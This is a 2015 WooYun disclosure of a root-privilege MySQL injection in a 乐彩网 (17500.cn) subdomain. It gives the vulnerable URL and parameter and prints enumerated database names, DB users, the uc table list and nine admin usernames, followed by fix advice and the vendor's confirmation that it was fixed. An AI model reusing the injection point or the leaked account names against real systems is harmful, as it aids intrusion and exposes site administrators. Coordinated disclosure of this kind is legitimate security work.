当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108789

漏洞标题:乐彩网某站点root权限mysql注入(泄露大量数据)

相关厂商:乐彩网

漏洞作者: 大懒

提交时间:2015-04-20 16:25

修复时间:2015-05-08 17:00

公开时间:2015-05-08 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-08: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

乐彩某站点注入泄露大量数据

详细说明:

存在问题的URL:http://lebi.17500.cn/experts/results/index/mtype/schs/eid/2514*
这里做了伪静态
存在问题应该是eid=2514
available databases [11]:
[*] bbslog
[*] cnlot2004
[*] information_schema
[*] lottery
[*] mysql
[*] newlebi
[*] performance_schema
[*] test
[*] uc
[*] ucbak
[*] uprofile
database management system users [4]:
[*] 'repl'@'192.168.%'
[*] 'root'@'192.168.100.%'
[*] 'root'@'localhost'
[*] 'user-read'@'192.168.100.%'
Database: uc
[39 tables]
+---------------------+
| uc_admin_js |
| uc_admins |
| uc_applications |
| uc_avatar_validate |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mail_log_0 |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_pms |
| uc_protectedmembers |
| uc_repass_log_0 |
| uc_settings |
| uc_sms_log_0 |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| uc_weakhomepwd_log |
| uc_weakpwd_log |
+---------------------+
Table: uc_admins
[9 entries]
+----------+
| username |
+----------+
| 4两搏千金 |
| eren |
| sky |
| 航线 |
| 好运2013 |
| 柯森 |
| 十一层 |
| 小美 |
| 转身的距离 |
+----------+
权限较高,风险较大

漏洞证明:

如上

修复方案:

1.过滤特殊字符
2.结构化sql查询

版权声明:转载请注明来源 大懒@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-20 17:06

厂商回复:

感谢。已收到。速度解决。

最新状态:

2015-04-20:已经处理,等待测试

2015-05-08:已经处理